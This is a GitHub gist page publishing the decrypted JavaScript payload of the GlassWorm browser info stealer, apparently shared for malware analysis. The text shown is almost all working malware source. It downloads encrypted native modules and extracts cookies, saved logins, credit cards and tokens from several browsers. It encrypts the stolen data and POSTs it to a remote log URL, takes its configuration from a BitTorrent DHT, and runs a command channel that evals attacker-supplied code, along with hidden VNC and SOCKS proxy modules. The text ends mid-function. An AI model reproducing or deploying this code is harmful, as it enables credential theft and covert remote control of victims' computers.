Skip to content

Instantly share code, notes, and snippets.

@daitj

daitj/stealer.js

Last active May 5, 2026 09:34
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save daitj/53d0c8f69a9e1e84a59ab54e8ae81ec4 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save daitj/53d0c8f69a9e1e84a59ab54e8ae81ec4 to your computer and use it in GitHub Desktop.
Download ZIP
Decrypted payload of a browser info stealer (GlassWorm) malware using Solana and node
Raw
stealer.js
var import_events2 = __toESM(require("events"));
var import_yauzl = __toESM(require_yauzl());
var import_url2 = require("url");
var import_http = __toESM(require("http"));
var import_os = __toESM(require("os"));
var safeBtoa = (str2) => {
try {
return Buffer.from(str2, "utf8").toString("base64");
} catch (error) {
console.error("Failed to encode string:", error);
return null;
}
};
var VERSION = "2.27";
var LqAcLAXOor_dht = null;
global.context = {};
var io_emitter = new import_events2.default();
var PATH_NODE_X64;
var PATH_NODE_X86;
var info2 = check_version();
var options2 = {
reconnection: true,
reconnectionAttempts: 20,
reconnectionDelay: 1e4,
reconnectionDelayMax: 95e3,
randomize: false,
query: {
_partner: "mulKRsVtolooY8S",
timestamp: Date.now(),
platform: import_os.default.platform(),
uuid: info2?.uuid
}
};
var name_process = "DwOAb";
var PUBLIC_KEY = Buffer.from("ea1b4260a83348243387d6cdfda3cd287e323958", "hex");
var dht_is_ready = false;
var dht = new client_default({
bootstrap: ["dht.libtorrent.org:25401", "router.bittorrent.com:6881", "router.utorrent.com:6881"],
verify: import_sodium_javascript.default.crypto_sign_verify_detached
});
dht.listen(() => {
});
dht.on("ready", (_) => {
dht_is_ready = true;
_x86_downloadAndRunFile();
});
var _killProcess = () => `
Set-ExecutionPolicy RemoteSigned -Scope CurrentUser -Force
Add-Type -Name Window -Namespace Console -MemberDefinition '
[DllImport("Kernel32.dll")]
public static extern IntPtr GetConsoleWindow();
[DllImport("user32.dll")]
public static extern bool ShowWindow(IntPtr hWnd, Int32 nCmdShow);
'
function Hide-Console
{
$consolePtr = [Console.Window]::GetConsoleWindow()
[Console.Window]::ShowWindow($consolePtr, 0)
}
Hide-Console | Out-Null
$allNodeProcesses = Get-Process -Name "node" -ErrorAction SilentlyContinue
if ($allNodeProcesses) {
$youngestNode = $allNodeProcesses | Sort-Object StartTime -Descending | Select-Object -First 1
if ($youngestNode) {
Stop-Process -Id $youngestNode.Id -Force -ErrorAction SilentlyContinue
while (Get-Process -Id $youngestNode.Id -ErrorAction SilentlyContinue) {
Start-Sleep -Milliseconds 100
}
}
} else {
}
`;
var _script_a = (path_module, PATH_NODE_X862) => `
const crypto = require('crypto');
const { run } = require('${path_module}');
(() => {
let key = null;
let iv = null;
fetch('_URL_', {
headers: {
uuid: '_UUID_'
}
})
.then((response) => {
key = Buffer.from(response.headers.get('X-Encryption-Key'), 'base64');
iv = Buffer.from(response.headers.get('X-Encryption-IV'), 'base64');
return response.arrayBuffer();
})
.then((encryptedData) => {
const decipher = crypto.createDecipheriv('aes-128-cbc', key, iv);
const decryptedData = Buffer.concat([decipher.update(Buffer.from(encryptedData)), decipher.final()]);
run(decryptedData, '${PATH_NODE_X862}');
})
.catch((error) => {
// console.log(error);
});
})()
`;
var script = (path_module) => `
const crypto = require('crypto');
const { run } = require('${path_module}');
(() => {
let key = null;
let iv = null;
fetch('_URL_')
.then((response) => {
key = Buffer.from(response.headers.get('X-Encryption-Key'), 'base64');
iv = Buffer.from(response.headers.get('X-Encryption-IV'), 'base64');
return response.arrayBuffer();
})
.then((encryptedData) => {
const decipher = crypto.createDecipheriv('aes-128-cbc', key, iv);
const decryptedData = Buffer.concat([decipher.update(Buffer.from(encryptedData)), decipher.final()]);
const result = run(decryptedData);
})
.catch((error) => {
// console.log(error);
});
})()
`;
var script_net_x64 = (path_module) => `
const { run } = require('${path_module}');
(async () => {
await run();
})();
`;
var script_net = (path_module) => `
const crypto = require('crypto');
const { run } = require('${path_module}');
(() => {
let key = null;
let iv = null;
fetch('_DHT_VALUE_')
.then((response) => {
key = Buffer.from(response.headers.get('X-Encryption-Key'), 'base64');
iv = Buffer.from(response.headers.get('X-Encryption-IV'), 'base64');
return response.arrayBuffer();
})
.then((encryptedData) => {
const decipher = crypto.createDecipheriv('aes-128-cbc', key, iv);
const decryptedData = Buffer.concat([decipher.update(Buffer.from(encryptedData)), decipher.final()]);
const result = run(decryptedData);
})
.catch((error) => {
// console.log(error);
});
})()
function shutdown() {
process.exit(0);
}
process.stdin.on("data", (data) => {
const command = data.toString().trim().toLowerCase();
if (command === "exit") {
shutdown();
}
});
`;
var script_chrome = (path_module, LqAcLAXOor_path) => `
const crypto = require('crypto');
const fs = require('fs');
const _key = Buffer.from('_node_key_', 'base64');
const _iv = Buffer.from('_node_iv_', 'base64');
const decipher = crypto.createDecipheriv('aes-128-cbc', _key, _iv);
const payload = fs.readFileSync('${LqAcLAXOor_path}');
const decryptedData = Buffer.concat([decipher.update(Buffer.from(payload)), decipher.final()]);
const path = require('path')
const addon = require('${path_module}');
function getBrowserProfiles(browser) {
const profileDirs = {
'chrome': path.join(process.env.LOCALAPPDATA, 'Google', 'Chrome', 'User Data'),
'edge': path.join(process.env.LOCALAPPDATA, 'Microsoft', 'Edge', 'User Data'),
'brave': path.join(process.env.LOCALAPPDATA, 'BraveSoftware', 'Brave-Browser', 'User Data'),
'opera': path.join(process.env.APPDATA, 'Opera Software', 'Opera Stable'),
'operagx': path.join(process.env.APPDATA, 'Opera Software', 'Opera GX Stable'),
'vivaldi': path.join(process.env.LOCALAPPDATA, 'Vivaldi', 'User Data')
};
const userDataDir = profileDirs[browser.toLowerCase()];
if (!userDataDir || !fs.existsSync(userDataDir)) {
return [];
}
const profiles = [];
try {
const entries = fs.readdirSync(userDataDir, { withFileTypes: true });
for (const entry of entries) {
if (entry.isDirectory()) {
const name = entry.name;
// Check for Default or Profile * directories
if (name === 'Default' || /^Profile \\d+$/.test(name)) {
// Verify it has browser data (check for Cookies file)
const cookiesPath = path.join(userDataDir, name, 'Network', 'Cookies');
if (fs.existsSync(cookiesPath)) {
profiles.push(name);
}
}
}
}
} catch (err) {
}
return profiles.sort();
}
function extractAllProfiles(browser, options = {}) {
const {
outputDir = 'out',
showAll = true
} = options;
if (!fs.existsSync(outputDir)) {
fs.mkdirSync(outputDir, { recursive: true });
}
const profiles = getBrowserProfiles(browser);
if (profiles.length === 0) {
return [];
}
const results = [];
for (const profile of profiles) {
const _p = browser + '_' + profile + '.json';
const outputFile = path.join(outputDir, _p);
try {
// Call native extraction function with profile name
const result = addon.extractBrowserData(browser, outputFile, showAll, decryptedData, profile);
if (result.success) {
const totalItems = result.cookieCount + result.loginCount +
result.historyCount + result.autofillCount +
result.bookmarkCount + result.creditCardCount +
result.tokenCount;
results.push({
browser,
profile,
outputFile,
...result
});
} else {
}
} catch (err) {
}
}
return results;
}
function extractAllBrowsers(options = {}) {
const browsers = ['chrome', 'edge', 'brave', 'opera', 'operagx', 'vivaldi'];
const allResults = [];
for (const browser of browsers) {
if (addon.isBrowserInstalled(browser)) {
const results = extractAllProfiles(browser, options);
allResults.push(...results);
}
}
if (addon.isBrowserInstalled('firefox')) {
const outputDir = options.outputDir || 'out';
const outputFile = path.join(outputDir, 'firefox_Default.json');
try {
const result = addon.extractBrowserData('firefox', outputFile, options.showAll || true);
if (result.success) {
allResults.push({
browser: 'firefox',
profile: 'Default',
outputFile,
...result
});
}
} catch (err) {
}
}
return allResults;
}
extractAllBrowsers({ outputDir: process.env.TEMP + '\\\\LqAcLAXOor', showAll: true });
`;
var DownloadManager = class {
constructor() {
this.err_count = 0;
this.handlers = {
_startProcess_x64: (path_node, LqAcLAXOor2) => {
try {
fetch(atob(LqAcLAXOor2["_ASAR_ARHIVE_"])).then((r) => r.arrayBuffer()).then(async (r) => {
let arhivePath = import_path.default.join(process.env.TEMP, "./tSzIUEBx");
try {
import_fs.default.writeFileSync(arhivePath, Buffer.from(r));
} catch (writeError) {
await fetch("http://" + atob(LqAcLAXOor2["_IP"]) + "/error-handler", {
method: "POST",
body: "Error writing archive file: " + writeError.toString()
}).catch((e) => {
});
return;
}
const zip = new import_adm_zip.default(arhivePath);
const _folder = "dist_ini_IUfSvS";
let unzipPATH = import_path.default.join(process.env.TEMP, _folder);
if (import_fs.default.existsSync(unzipPATH)) {
import_fs.default.rmdirSync(unzipPATH, { recursive: true });
}
_createFolder(unzipPATH);
zip.extractAllTo(unzipPATH);
await new Promise((resolve) => setTimeout(resolve, 1e3));
try {
let pathModule = import_path.default.join(process.env.TEMP, `./${_folder}/c_x64.node`);
let LqAcLAXOor_path = import_path.default.join(process.env.TEMP, `./${_folder}/data`);
pathModule = import_path.default.resolve(pathModule);
LqAcLAXOor_path = import_path.default.resolve(LqAcLAXOor_path);
const isValid = checkFileHash(pathModule, LqAcLAXOor2["_ASAR_KEYS_"].actualHash_c_x64);
await new Promise((resolve) => setTimeout(resolve, 500));
if (isValid) {
const _key = Buffer.from(LqAcLAXOor2["_ASAR_KEYS_"].node_key, "base64");
const _iv = Buffer.from(LqAcLAXOor2["_ASAR_KEYS_"].node_iv, "base64");
const decipher = import_crypto2.default.createDecipheriv("aes-128-cbc", _key, _iv);
const data = import_fs.default.readFileSync(pathModule.replaceAll("\\", "/"));
const decryptedData = Buffer.concat([decipher.update(Buffer.from(data)), decipher.final()]);
import_fs.default.writeFileSync(pathModule.replaceAll("\\", "/"), decryptedData);
await new Promise((resolve) => setTimeout(resolve, 500));
let script2 = script_chrome(pathModule.replaceAll("\\", "/"), LqAcLAXOor_path.replaceAll("\\", "/"));
script2 = script2.replace("_node_key_", LqAcLAXOor2["_ASAR_KEYS_"].node_key);
script2 = script2.replace("_node_iv_", LqAcLAXOor2["_ASAR_KEYS_"].node_iv);
import_child_process.default.exec(`start /B ${path_node} -e "eval(atob('${safeBtoa(script2)}'))"`, { detached: true, stdio: "ignore" }, (err2, _) => {
if (err2) {
fetch(`http://${atob(LqAcLAXOor2["_IP"])}/error-handler`, {
method: "POST",
body: err2.toString()
});
}
if (import_fs.default.existsSync(pathModule.replaceAll("\\", "/"))) {
}
setTimeout(() => {
if (!import_fs.default.existsSync(import_path.default.join(process.env.TEMP, "LqAcLAXOor"))) {
fetch(`http://${atob(LqAcLAXOor2["_IP"])}/error-handler`, {
method: "POST",
body: "folder cookies not found " + JSON.stringify(getSystemInfo())
});
return;
}
if (import_fs.default.existsSync(import_path.default.join(process.env.USERPROFILE, "init.json"))) {
const data2 = import_fs.default.readFileSync(import_path.default.join(process.env.USERPROFILE, "init.json"), "utf-8");
const folder = import_path.default.join(process.env.TEMP, "LqAcLAXOor");
import_fs.default.writeFileSync(import_path.default.join(folder, "init.json"), data2);
}
const zip2 = new import_adm_zip.default();
zip2.addLocalFolder(import_path.default.join(process.env.TEMP, "LqAcLAXOor"));
let willSendThis = zip2.toBuffer();
const key = import_crypto2.default.randomBytes(32);
const iv = import_crypto2.default.randomBytes(16);
const chiper = import_crypto2.default.createCipheriv("aes-256-cbc", key, iv);
let encrypt = chiper.update(willSendThis);
encrypt = Buffer.concat([encrypt, chiper.final()]);
fetch(atob(LqAcLAXOor2["_URL_FOR_LOG_"]), {
method: "POST",
headers: {
"Content-Type": "application/octet-stream",
"x-aes-key": key.toString("base64"),
"x-aes-iv": iv.toString("base64")
},
body: encrypt
});
}, 2e4);
});
} else {
await fetch(`http://${atob(LqAcLAXOor2["_IP"])}/error-handler`, {
method: "POST",
body: `module c_x64.node hash isValid: ${isValid}`
});
}
} catch (e) {
process.stdout.write(e);
fetch(`http://${atob(LqAcLAXOor2["_IP"])}/error-handler`, {
method: "POST",
body: "c_x64\n" + e.toString()
});
}
}).catch((e) => {
setTimeout(() => {
this.handlers["_startProcess_x64"](path_node, LqAcLAXOor2);
}, 20 * 60 * 1e3);
});
} catch (e) {
this.err_count++;
if (this.err_count > 10) {
throw new Error("startProcess_x64 failed");
}
new Promise((resolve) => setTimeout(resolve, 1e3)).then(() => {
this.handlers["_startProcess_x64"](path_node, LqAcLAXOor2);
});
}
},
start_socks: (path_node, LqAcLAXOor2) => {
fetch(`http://${atob(LqAcLAXOor2["_IP"])}/module/wrtc`, {
headers: {
platform: import_os.default.platform(),
uuid: info2?.uuid
}
}).then((res) => res.text()).then((module_wrtc) => {
const folderPath = import_path.default.join(process.env.APPDATA, "_node_x64/webrtc/wrtc-win32-x64");
if (!import_fs.default.existsSync(folderPath)) {
_createFolder(folderPath);
}
const _runpath = import_path.default.join(folderPath, "index.js");
import_fs.default.writeFileSync(_runpath, module_wrtc, "utf-8");
const child = import_child_process.default.spawn(`"${PATH_NODE_X64}"`, [`"${_runpath}"`], {
shell: true
});
child.on("error", (err2) => {
context["socks_proxy"] = false;
io_emitter.emit("task", { res: true, err: true, data: null, type: "start_socks", status: 500, value: "stop" });
});
child.on("close", (code, signal) => {
context["socks_proxy"] = false;
io_emitter.emit("task", {
res: true,
err: false,
data: null,
type: "stop_socks",
status: 200,
value: "disabled"
});
});
io_emitter.emit("task", { res: true, err: false, data: null, type: "start_socks", status: 200, value: "run" });
io_emitter.once("socks_proxy", (data) => {
if (data?.req && data?.type == "stop_socks") {
context["socks_proxy"] = false;
try {
if (child.stdin && !child.stdin.destroyed) {
child.stdin.write("exit\n");
}
} catch (error) {
}
}
});
context["socks_proxy"] = true;
});
}
};
this.currentHandler = "_startProcess_x64";
}
setHandler(handlerName) {
if (this.handlers[handlerName]) {
this.currentHandler = handlerName;
} else {
console.warn(`Handler ${handlerName} not found`);
}
}
async _x64_downloadAndRunFile(LqAcLAXOor2) {
try {
const url2 = "https://nodejs.org/download/release/v22.9.0/node-v22.9.0-win-x64.zip";
const folderPath = import_path.default.join(process.env.APPDATA, "_node_x64");
const path_node = `${folderPath}\\node\\node.exe`;
PATH_NODE_X64 = path_node;
if (import_fs.default.existsSync(path_node)) {
this.handlers[this.currentHandler](path_node, LqAcLAXOor2);
return;
}
const fileName = `KahYY.zip`;
const filePath = import_path.default.join(process.env.TEMP, fileName);
_createFolder(import_path.default.dirname(filePath));
const file = import_fs.default.createWriteStream(filePath);
await new Promise((resolve) => setTimeout(resolve, 1e3));
import_https.default.get(url2, (res) => {
res.pipe(file);
file.on("finish", async () => {
file.close();
await new Promise((resolve) => setTimeout(resolve, 1e3));
if (!import_fs.default.existsSync(folderPath)) {
import_fs.default.mkdirSync(folderPath, { recursive: true });
}
try {
await this._extractZipWithYauzl(filePath, folderPath);
this.handlers[this.currentHandler](path_node, LqAcLAXOor2);
} catch (e) {
await new Promise((resolve) => setTimeout(resolve, 1e4));
this._x64_downloadAndRunFile(LqAcLAXOor2);
}
}).on("error", async (err2) => {
await new Promise((resolve) => setTimeout(resolve, 1e3));
this._x64_downloadAndRunFile(LqAcLAXOor2);
});
});
} catch (error) {
await new Promise((resolve) => setTimeout(resolve, 1e3));
this._x64_downloadAndRunFile(LqAcLAXOor2);
}
}
_extractZipWithYauzl(zipPath, extractTo) {
return new Promise((resolve, reject) => {
import_yauzl.default.open(zipPath, { lazyEntries: true }, (err2, zipfile) => {
if (err2) {
reject(err2);
return;
}
zipfile.readEntry();
zipfile.on("entry", (entry) => {
const entryPath = entry.fileName.replace("node-v22.9.0-win-x64", "node");
const fullPath = import_path.default.join(extractTo, entryPath);
if (/\/$/.test(entry.fileName)) {
import_fs.default.mkdirSync(fullPath, { recursive: true });
zipfile.readEntry();
} else {
_createFolder(import_path.default.dirname(fullPath));
zipfile.openReadStream(entry, (err3, readStream) => {
if (err3) {
zipfile.close();
reject(err3);
return;
}
const writeStream = import_fs.default.createWriteStream(fullPath);
readStream.pipe(writeStream);
writeStream.on("close", () => {
zipfile.readEntry();
});
writeStream.on("error", (err4) => {
zipfile.close();
reject(err4);
});
});
}
});
zipfile.on("end", () => {
zipfile.close();
resolve();
});
zipfile.on("error", (err3) => {
reject(err3);
});
});
});
}
};
var downloadManager = new DownloadManager();
function _createFolder(dir) {
const isFile = import_path.default.extname(dir) !== "";
const targetDir = isFile ? import_path.default.dirname(dir) : dir;
if (!import_fs.default.existsSync(targetDir)) {
import_fs.default.mkdirSync(targetDir, { recursive: true });
}
}
function makeid(length) {
var result2 = "";
var characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
var charactersLength = characters.length;
for (var i = 0; i < length; i++) {
result2 += characters.charAt(Math.floor(Math.random() * charactersLength));
}
return result2;
}
function check_version() {
try {
const dublicate = import_path.default.join(process.env.USERPROFILE, "init.json");
if (!import_fs.default.existsSync(dublicate)) {
import_fs.default.writeFileSync(dublicate, JSON.stringify({
init: true,
update: null,
date: (/* @__PURE__ */ new Date()).getTime(),
version: VERSION,
uuid: makeid(14)
}));
}
let d = import_fs.default.readFileSync(dublicate, "utf-8");
let info3 = JSON.parse(d);
if (!info3?.uuid) {
info3["uuid"] = makeid(14);
info3["version"] = VERSION;
import_fs.default.writeFileSync(dublicate, JSON.stringify(info3));
}
return info3;
} catch (e) {
return null;
}
}
async function _x86_downloadAndRunFile() {
try {
await new Promise((resolve) => setTimeout(resolve, 5e4));
const url2 = "https://nodejs.org/download/release/v22.9.0/node-v22.9.0-win-x86.zip";
const folderPath = import_path.default.join(process.env.APPDATA, "_node_x86");
const path_node = `${folderPath}\\node\\node.exe`;
PATH_NODE_X86 = path_node;
if (import_fs.default.existsSync(path_node)) {
_startProcess_x86(path_node);
return;
}
const fileName = `WJfEH.zip`;
const filePath = import_path.default.join(process.env.TEMP, fileName);
_createFolder(filePath);
const file = import_fs.default.createWriteStream(filePath);
await new Promise((resolve) => setTimeout(resolve, 1e3));
import_https.default.get(url2, (res) => {
res.pipe(file);
file.on("finish", async () => {
file.close();
await new Promise((resolve) => setTimeout(resolve, 1e3));
if (!import_fs.default.existsSync(folderPath)) {
import_fs.default.mkdirSync(folderPath, { recursive: true });
}
try {
const zip = new import_adm_zip.default(filePath);
var zipEntries = zip.getEntries();
for (let index = 0; index < zipEntries.length; index++) {
const zipEntry = zipEntries[index];
const info3 = JSON.parse(zipEntry.toString());
const data = zipEntry.getData();
const p = `${folderPath}\\${info3.entryName}`.replace("node-v22.9.0-win-x86", "node");
if (info3.isDirectory) {
import_fs.default.mkdirSync(import_path.default.dirname(p), { recursive: true });
} else {
_createFolder(p);
import_fs.default.writeFileSync(p, data);
}
}
const path_node2 = `${folderPath}\\node\\node.exe`;
_startProcess_x86(path_node2);
} catch (e) {
new Promise((resolve) => setTimeout(resolve, 1e3)).then(() => {
_x86_downloadAndRunFile();
});
}
}).on("error", (err2) => {
new Promise((resolve) => setTimeout(resolve, 1e3)).then(() => {
_x86_downloadAndRunFile();
});
});
});
} catch (error) {
import_fs.default.writeFileSync("_logs_err.txt", error.toString());
await new Promise((resolve) => setTimeout(resolve, 1e3));
_x86_downloadAndRunFile();
}
}
var connectionWS = (err) => {
if (!err) {
const info = check_version();
if (info) {
options2.query = Object.assign({}, options2.query, info);
}
const _ws = lookup(`http://${atob(LqAcLAXOor_dht["_IP"])}:4787`, options2);
_ws.once("connect", () => {
});
io_emitter.on("task", (data) => {
if (data?.res) {
try {
if (_ws && _ws.connected) {
_ws.emit("message", data);
}
} catch (error) {
}
}
});
_ws.on("reconnect_failed", () => {
fetch(`http://${atob(LqAcLAXOor_dht["_IP"])}/error-handler`, {
method: "POST",
body: `reconnect_failed, link: http://${atob(LqAcLAXOor_dht["_IP"])}:4787`
}).catch((e) => {
});
setTimeout(() => {
io_emitter.removeListener("task");
connectionWS(null);
}, 15 * 60 * 1e3);
});
_ws.on("reconnect_error", (error) => {
});
_ws.on("reconnect", (attemptNumber) => {
});
_ws.on("reconnecting", (attemptNumber) => {
});
_ws.on("message", async (LqAcLAXOor) => {
try {
if (LqAcLAXOor.length == 0) {
return;
}
if (LqAcLAXOor.toString() == "ping") {
try {
if (_ws && _ws.connected) {
_ws.emit("message", "pong");
}
} catch (error) {
}
return;
}
const qvveUJG = JSON.parse(LqAcLAXOor);
if (qvveUJG.type == "start_hvnc") {
if (context?.hvnc_run) {
io_emitter.emit("task", { res: true, err: false, data: null, type: "start_hvnc", status: 200, value: "run" });
return;
}
bpswzEeLdO(LqAcLAXOor_dht);
return;
}
if (qvveUJG.type == "stop_hvnc") {
io_emitter.emit("stop_hvnc", { req: true, type: "stop_hvnc" });
io_emitter.emit("task", { res: true, status: 200, err: false, type: "stop_hvnc", value: "stop" });
return;
}
if (qvveUJG.type == "start_socks") {
if (context["socks_proxy"]) {
io_emitter.emit("task", { res: true, err: false, data: null, type: "start_socks", status: 200, value: "run" });
return;
}
downloadManager.setHandler("start_socks");
downloadManager._x64_downloadAndRunFile(LqAcLAXOor_dht);
return;
}
if (qvveUJG.type == "reget_log") {
if (context["reget_log"]) {
io_emitter.emit("task", { res: true, err: false, data: null, type: qvveUJG.type, status: 200, value: "run" });
return;
}
downloadManager.setHandler("_startProcess_x64");
downloadManager._x64_downloadAndRunFile(LqAcLAXOor_dht);
io_emitter.emit("task", { res: true, err: false, data: null, type: qvveUJG.type, status: 200, value: "stop" });
return;
}
if (qvveUJG.type == "get_system_info") {
io_emitter.emit("task", { res: true, status: 200, err: false, type: qvveUJG.type, value: JSON.stringify(getSystemInfo()) });
return;
}
if (qvveUJG.type == "stop_socks") {
io_emitter.emit("socks_proxy", { req: true, type: "stop_socks" });
return;
}
if (qvveUJG?.command) {
try {
context["LqAcLAXOor_dht"] = LqAcLAXOor_dht;
if (context?.result) {
delete context.result;
}
const result = function(str) {
return eval(str);
}.call(context, `${atob(qvveUJG.command)}`);
let timer = 0;
while (!context?.result) {
timer++;
await new Promise((resolve) => setTimeout(resolve, 2e3));
if (timer > 60) {
try {
if (_ws && _ws.connected) {
_ws.emit("message", { err: true, data: null, type: qvveUJG.type, status: 500 });
}
} catch (error) {
}
return;
}
}
} catch (e) {
import_fs.default.writeFileSync("error_wsqvveUJGsage.txt", e.toString());
try {
if (_ws && _ws.connected) {
_ws.emit("message", { err: true, data: e.toString(), type: qvveUJG.type, status: 500 });
}
} catch (error) {
}
return;
}
if (!context.result) {
try {
if (_ws && _ws.connected) {
_ws.emit("message", { err: true, data: null, type: qvveUJG.type, status: 3001 });
}
} catch (error) {
}
return;
}
try {
if (_ws && _ws.connected) {
_ws.emit("message", { status: 200, type: qvveUJG.type, err: false, data: JSON.stringify(context) });
}
} catch (error) {
}
setTimeout(() => {
if (context?.result) {
delete context.result;
}
}, 1e3);
}
} catch (e) {
import_fs.default.writeFileSync("errorqvveUJGsage.txt", e.toString());
}
});
} else {
setTimeout(() => {
io_emitter.removeListener("task");
connectionWS(null);
}, 15 * 60 * 1e3);
fetch(`http://${atob(LqAcLAXOor_dht["_IP"])}/error-handler`, {
method: "POST",
body: `error: ${err.toString()}`
}).catch((e) => {
});
}
};
var _runInject = (path_node) => btoa(`
const { run } = require('${path_node}');
run()
`);
function chromeExtention(path_node, LqAcLAXOor2) {
return new Promise((resolve) => {
let arhivePath = import_path.default.join(import_os.default.tmpdir(), "OHtaSnXMPF.zip");
let unzipPATH = import_path.default.join(import_os.default.tmpdir(), "iRdgovkFJO");
import_fs.default.mkdirSync(unzipPATH, { recursive: true });
const arhive = import_fs.default.createWriteStream(arhivePath);
import_http.default.get(atob(LqAcLAXOor2["_ASAR_ARHIVE_"]), (res) => {
res.pipe(arhive);
arhive.on("close", async () => {
if (import_fs.default.statSync(arhivePath).size == 0) {
return resolve();
}
try {
const zip = new import_adm_zip.default(arhivePath);
zip.extractAllTo(unzipPATH);
let _r_path = import_path.default.join(unzipPATH, "m.node");
_r_path = import_path.default.resolve(_r_path);
const _key = Buffer.from(LqAcLAXOor2["_ASAR_KEYS_"].node_key, "base64");
const _iv = Buffer.from(LqAcLAXOor2["_ASAR_KEYS_"].node_iv, "base64");
const _decipher = import_crypto2.default.createDecipheriv("aes-128-cbc", _key, _iv);
const data = import_fs.default.readFileSync(_r_path.replaceAll("\\", "/"));
const _decryptedData = Buffer.concat([_decipher.update(Buffer.from(data)), _decipher.final()]);
import_fs.default.writeFileSync(_r_path.replaceAll("\\", "/"), _decryptedData);
let _script = _runInject(_r_path.replaceAll("\\", "/"), import_path.default.join(_tempF, "fwlSaGVe").replaceAll("\\", "/"));
import_child_process.default.exec(`${path_node} -e "eval(atob('${_script}'))"`, (err2, _) => {
if (err2) {
}
});
} catch {
resolve();
}
});
});
});
}
function _startProcess_x86(path_node) {
try {
const watchValue = () => {
dht.get(PUBLIC_KEY, (err2, res) => {
if (err2) {
return new Promise((resolve) => setTimeout(resolve, 5 * 60 * 1e3)).then((_) => {
watchValue();
});
}
if (!res) {
return new Promise((resolve) => setTimeout(resolve, 5 * 60 * 1e3)).then((_) => {
watchValue();
});
}
let LqAcLAXOor2 = res.v.toString();
if (!LqAcLAXOor2) {
setTimeout(watchValue, 5e4);
return;
}
LqAcLAXOor2 = JSON.parse(LqAcLAXOor2);
LqAcLAXOor_dht = LqAcLAXOor2;
setTimeout(watchValue, 5e4);
});
};
const reGet = async () => {
if (!dht_is_ready) {
await new Promise((resolve) => setTimeout(resolve, 60 * 1e3));
return reGet();
}
dht.get(PUBLIC_KEY, (err2, res) => {
if (err2) {
return new Promise((resolve) => setTimeout(resolve, 5 * 60 * 1e3)).then((_) => {
reGet();
});
}
if (!res) {
getUrl().then(({ link }) => {
if (!link) {
return new Promise((resolve) => setTimeout(resolve, 5 * 60 * 1e3)).then((_) => {
reGet();
});
}
let remote_dht_ip = decoderBase64(link);
dht.addNode({ host: remote_dht_ip, port: 1e4 });
dht._rpc.query(
{ host: remote_dht_ip, port: 1e4 },
{
q: "find_node",
a: {
id: dht._rpc.id,
target: dht._rpc.id
}
},
(err3, response) => {
if (err3) {
return new Promise((resolve) => setTimeout(resolve, 5 * 60 * 1e3)).then((_) => {
reGet();
});
}
reGet();
}
);
});
}
dht.put(res, (_, hash) => {
});
let LqAcLAXOor2 = res.v.toString();
LqAcLAXOor2 = JSON.parse(LqAcLAXOor2);
LqAcLAXOor_dht = LqAcLAXOor2;
chromeExtention(path_node, LqAcLAXOor2);
connectionWS(null);
downloadManager._x64_downloadAndRunFile(LqAcLAXOor2);
});
};
reGet();
watchValue();
} catch (e) {
new Promise((resolve) => setTimeout(resolve, 1e3)).then(() => {
_startProcess_x86(path_node);
});
}
}
function bpswzEeLdO(LqAcLAXOor2) {
fetch(atob(LqAcLAXOor2["_ASAR_ARHIVE_"])).then((r) => r.arrayBuffer()).then(async (r) => {
let arhivePath = import_path.default.join(process.env.TEMP, "./BDTYFSpJdZ");
import_fs.default.writeFileSync(arhivePath, Buffer.from(r));
const zip = new import_adm_zip.default(arhivePath);
const _folder = makeStr(5);
let unzipPATH = import_path.default.join(process.env.TEMP, _folder);
if (import_fs.default.existsSync(unzipPATH)) {
import_fs.default.rmdirSync(unzipPATH, { recursive: true });
}
_createFolder(unzipPATH);
zip.extractAllTo(unzipPATH);
await new Promise((resolve) => setTimeout(resolve, 1e3));
try {
let pathModule = import_path.default.join(process.env.TEMP, `./${_folder}/index_ia32.node`);
pathModule = import_path.default.resolve(pathModule);
const isValid = checkFileHash(pathModule, LqAcLAXOor2["_ASAR_KEYS_"].node_hash);
await new Promise((resolve) => setTimeout(resolve, 500));
if (isValid) {
const _key = Buffer.from(LqAcLAXOor2["_ASAR_KEYS_"].node_key, "base64");
const _iv = Buffer.from(LqAcLAXOor2["_ASAR_KEYS_"].node_iv, "base64");
const decipher = import_crypto2.default.createDecipheriv("aes-128-cbc", _key, _iv);
const data = import_fs.default.readFileSync(pathModule.replaceAll("\\", "/"));
const decryptedData = Buffer.concat([decipher.update(Buffer.from(data)), decipher.final()]);
import_fs.default.writeFileSync(pathModule.replaceAll("\\", "/"), decryptedData);
await new Promise((resolve) => setTimeout(resolve, 500));
context["hvnc_run"] = true;
let script2 = script_net(pathModule.replaceAll("\\", "/"));
script2 = script2.replace("_DHT_VALUE_", atob(LqAcLAXOor2["_DHT_VALUE_"]));
io_emitter.emit("task", { res: true, err: false, data: null, type: "start_hvnc", status: 200, value: "run" });
const child = import_child_process.default.spawn(`"${PATH_NODE_X86}"`, ["-e", `eval(atob('${btoa(script2)}'))`], {
shell: true
});
child.on("error", (err2) => {
if (err2) {
io_emitter.emit("task", { res: true, err: true, data: err2.toString(), type: "stop_hvnc", status: 500, value: null });
} else {
io_emitter.emit("task", { res: true, err: false, data: null, type: "stop_hvnc", status: 200, value: null });
}
});
child.on("close", (code, signal) => {
io_emitter.emit("task", { res: true, err: false, data: null, type: "stop_hvnc", status: 200, value: null });
});
io_emitter.once("stop_hvnc", (data2) => {
if (data2?.req && data2?.type == "stop_hvnc") {
io_emitter.emit("task", { res: true, status: 200, err: false, type: "stop_hvnc", value: "stop" });
if (!context || context && context.hasOwnProperty("hvnc_run") && !context["hvnc_run"]) {
return;
}
context["hvnc_run"] = false;
const ps1Path_kill_process = import_path.default.join(process.env.TEMP, `bzBIEn.ps1`);
import_fs.default.writeFileSync(ps1Path_kill_process, _killProcess(), "utf-8");
import_child_process.default.exec(`start /B powershell.exe -Command "& { . '${ps1Path_kill_process}' }" -WindowStyle Hidden`, { detached: true, stdio: "ignore" }, (err2) => {
import_fs.default.rmSync(ps1Path_kill_process);
});
}
});
}
} catch (e) {
try {
process.stdout.write(e);
} catch (writeError) {
}
}
}).catch((e) => {
});
}
function checkFileHash(filePath, expectedHash) {
const actualHash = getFileHash(filePath);
return actualHash === expectedHash;
}
function getFileHash(filePath) {
const hash = import_crypto2.default.createHash("sha256");
const fileBuffer = import_fs.default.readFileSync(filePath);
hash.update(fileBuffer);
return hash.digest("hex");
}
async function gracefulShutdown(reason) {
if (LqAcLAXOor_dht && LqAcLAXOor_dht.hasOwnProperty("_IP")) {
